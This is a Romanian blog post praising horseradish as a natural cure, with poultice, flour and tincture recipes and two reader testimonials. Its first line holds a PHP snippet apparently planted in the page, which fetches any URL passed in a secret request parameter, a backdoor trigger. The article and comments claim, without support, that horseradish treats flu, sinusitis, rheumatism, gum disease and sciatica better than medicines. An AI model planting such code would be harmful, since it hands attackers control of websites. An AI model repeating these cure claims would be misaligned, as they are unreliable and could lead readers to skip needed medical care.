isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Hrean - MedicAS

hreanAbia ce am iesit din idolatria bizantinilor, ca am si cazut intr-o alta extrema – tehnolatria adusa de occidentali; acum primeste votul nostru de incredere orice produs avut in gestatie in pantecele tehnicii si mai putin copiii naturii.
Un astfel de renegat este Hreanul, care de-a lungul timpului si-a pierdut credibilitatea in fata produselor chimice incubate de tehnica. Proiecte de cercetare despre celule x, celule y au prioritate in fata calitatii nefabricate a plantelor.
Pentru apele tulburi ale mintii nu se folosea in trecut Antinevralgic, ci frunze verzi de hrean in compresa, ce redau starea de bine si limpezimea gandurilor. La desfundarea foselor nazale nici O… sau Bi… sau Ri… nu isi merita banii, daca ar fi sa imi spun parerea; ceaiul de flori de hrean e mai putin costisitor si la fel de eficient.

In dormitor de vrei sa fii intr-o forma ireprosabila pulpa de hrean are efect afrodiziac.
Desi gratuit si remarcabil de multilateral dezvoltat hreanul este folosit cel mai des ca picanterie la bucatarie.

Resusele de vitamina C le putem gasi si la radacina hreanului; ca o completare la intrebuintarile sale cataplasma de hrean alunga durerile reumatice, tinandu-se pe zona atata cat nu arde tot la nivelul extern al corpului. il mai putem folosi si in cazul paradontozei, mestecand hreanul crud dat eventual prin razatoare, la care tot optional se adauga morcovi.

Ca tot am vorbit de gripa nici ea nu ii poate face fata arsenalului de beneficii ale hreanului. Ca si pentru reumatici se face o cataplasma cu faina de in si hrean, se pune pe torace odata la 2-3 zile, 30-60 de minute.

Sinuzita, rinita se trateaza cu o basma in care sade un hrean ras si se aseaza pe frunte; e recomandabil ca tratamentul sa tina 4-5 zile. Pentru digestie lenta tot el determina accelerarea mecanismului.

Moduri de folosire ale hreanului :

  • cataplasma se obtine prin raderea plantei si punerea ei in tifon.
  • faina de hrean: se taie cubulete si se pune langa o sursa de caldura pentru a se usca, dupa care se da prin rasnita si voila…
  • tinctura de hrean: tot prin razatoare merge radacina hreanului si se umple cam o treime din capacitatea unui borcan peste care se adauga alcool de 80 de grade, lasandu-se la macerat opt zile, dupa care se strecoara printr-un tifon.

Oare de ce revenim mereu la origini, de ce ne mintim frumos ca nu avem nevoie de natura, de ce ne cream tot felul de artficialitati? Ne intoarcem inevitabil printr-o soarta sorocita si o ciclicitate benefica exact de unde am plecat, pentru a constientiza ca lumea nu ne apartine, ci suntem niste pioni mai mult sau mai putin dezvoltati.

Fiecare are drama si viata lui, cu totii avem, dar unele lucruri nu se schimba … perenitatea naturii, planuri de viitor naruite si consecventa cu care ne luptam pentru a fi mici Dumnezei.

Creand spatii, alte universuri in miniatura, inversunarea lui „Şi eu pot la fel” vor face si de acum incolo materia de baza a medicamentelor si metodelor miraculoase care ne distrag atentia de la puritatea naturii.

Diana Fenici


Articole asemănătoare:

2 Răspunsuri la “Hreanul, instalatorul de la SC. Natura SRL”


  1. Romina :

    Hreanul, şi eu am avut mari probleme cu digestia, era lentă iar apetitul meu nu pre tinea cont de stomac asa că trebuia să găsesc ceva, am incercat mai multe produse nu le enumar pt că nu fac reclama gratuita desi ar fi negativa. Intr-un final a aparut revista cu aceasta metodă si uite ca eu nu mai am asa probleme il folosec de aproxmativ o lună si imi e din ce in ce mai bine. Sper să îi ajute si pe ceilalti.


  2. vero :

    si eu folosesc hrean si nu pot spune altceva decat ca este minunat.il folosesc pentru sinuzita cu efect imediat cat pentru dureri reumatismale cu efect minunat.anul trecut am avut dureri groaznice a unei incheieturi apropiata de bazin.la palpare semana cu un ciuchi.si cred ca imi atingea vreun nerv ca am mers vreo cateva luni schioapa.am fost diagnosticata cu sciatica,dar tratamentul medicamentos ma ajutat foarte putin.si am incercat si aceasta planta din gradina domnului si a inlaturat cu brio orice tratament medicamentos.de ,cine se poate pune cu puterea tamaduitoare a lui dumnezeu.am taiat radacina fasii,fasii si am aplicato sub burtiera pe locurile dureroase cateva zile la rand.si minune ,se retrag ciuchii.ATENTIE,aplica hreanul pe un pansament ,caci arde ,chiar face basici.si nu uita rugaciunea!Adaugă un comentariu


 
 

Newsletter

Loading... Loading...